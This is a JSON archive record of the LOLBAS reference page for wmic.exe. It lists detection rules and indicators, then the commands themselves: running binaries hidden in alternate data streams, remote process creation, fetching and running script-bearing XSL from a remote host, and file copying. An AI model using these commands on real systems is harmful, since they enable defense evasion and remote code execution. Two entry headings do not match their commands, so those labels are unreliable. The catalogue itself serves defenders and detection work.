{
	"id": "004d7e8c-990b-450e-9e1b-ccdb4c9d7f9d",
	"created_at": "2026-04-06T00:08:17.043659Z",
	"updated_at": "2026-04-10T03:21:14.561751Z",
	"deleted_at": null,
	"sha1_hash": "a314e0e76a3b560238b10c2145e0225f9061ab55",
	"title": "Wmic on LOLBAS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 65839,
	"plain_text": "Wmic on LOLBAS\r\nArchived: 2026-04-05 14:29:08 UTC\r\n.. /Wmic.exe\r\nThe WMI command-line (WMIC) utility provides a command-line interface for WMI\r\nPaths:\r\nC:\\Windows\\System32\\wbem\\wmic.exe\r\nC:\\Windows\\SysWOW64\\wbem\\wmic.exe\r\nResources:\r\nhttps://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory\r\nhttps://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html\r\nhttps://twitter.com/subTee/status/986234811944648707\r\nAcknowledgements:\r\nCasey Smith (@subtee)\r\nAvihay Eldad (@AvihayEldad)\r\nDetections:\r\nSigma: image_load_wmic_remote_xsl_scripting_dlls.yml\r\nSigma: proc_creation_win_wmic_xsl_script_processing.yml\r\nSigma: proc_creation_win_wmic_squiblytwo_bypass.yml\r\nSigma: proc_creation_win_wmic_eventconsumer_creation.yml\r\nElastic: defense_evasion_suspicious_wmi_script.toml\r\nElastic: persistence_via_windows_management_instrumentation_event_subscription.toml\r\nElastic: defense_evasion_suspicious_managedcode_host_process.toml\r\nSplunk: xsl_script_execution_with_wmic.yml\r\nSplunk: remote_wmi_command_attempt.yml\r\nSplunk: remote_process_instantiation_via_wmi.yml\r\nSplunk: process_execution_via_wmi.yml\r\nBlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules\r\nIOC: Wmic retrieving scripts from remote system/Internet location\r\nIOC: DotNet CLR libraries loaded into wmic.exe\r\nIOC: DotNet CLR Usage Log - wmic.exe.log\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Wmic/\r\nPage 1 of 4\n\nIOC: wmiprvse.exe writing files\r\nAlternate data streams\r\n1. Execute a .EXE file stored as an Alternate Data Stream (ADS)\r\nwmic.exe process call create \"C:\\Windows\\Temp\\file.ext:program.exe\"\r\nUse case\r\nExecute binary file hidden in Alternate data streams to evade defensive counter measures\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1564.004: NTFS File Attributes\r\nTags\r\nExecute: EXE\r\nExecute\r\n1. Execute calc from wmic\r\nwmic.exe process call create \"cmd /c c:\\windows\\system32\\calc.exe\"\r\nUse case\r\nExecute binary from wmic to evade defensive counter measures\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: CMD\r\n2. Execute evil.exe on the remote system.\r\nwmic.exe /node:\"192.168.0.1\" process call create \"cmd /c c:\\windows\\system32\\calc.exe\"\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Wmic/\r\nPage 2 of 4\n\nUse case\r\nExecute binary on a remote system\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: CMD\r\nExecute: Remote\r\n3. Create a volume shadow copy of NTDS.dit that can be copied.\r\nwmic.exe process get brief /format:\"https://www.example.org/file.xsl\"\r\nUse case\r\nExecute binary on remote system\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: XSL\r\nExecute: Remote\r\n4. Executes JScript or VBScript embedded in the target remote XSL stylsheet.\r\nwmic.exe process get brief /format:\"\\\\servername\\C$\\Windows\\Temp\\file.xsl\"\r\nUse case\r\nExecute script from remote system\r\nPrivileges required\r\nUser\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Wmic/\r\nPage 3 of 4\n\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218: System Binary Proxy Execution\r\nTags\r\nExecute: XSL\r\nExecute: Remote\r\nCopy\r\n1. Copy file from source to destination.\r\nwmic.exe datafile where \"Name='C:\\\\windows\\\\system32\\\\calc.exe'\" call Copy \"C:\\\\users\\\\public\\\\calc.exe\"\r\nUse case\r\nCopy file.\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Wmic/\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Wmic/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://lolbas-project.github.io/lolbas/Binaries/Wmic/"
	],
	"report_names": [
		"Wmic"
	],
	"threat_actors": [],
	"ts_created_at": 1775434097,
	"ts_updated_at": 1775791274,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a314e0e76a3b560238b10c2145e0225f9061ab55.pdf",
		"text": "https://archive.orkl.eu/a314e0e76a3b560238b10c2145e0225f9061ab55.txt",
		"img": "https://archive.orkl.eu/a314e0e76a3b560238b10c2145e0225f9061ab55.jpg"
	}
}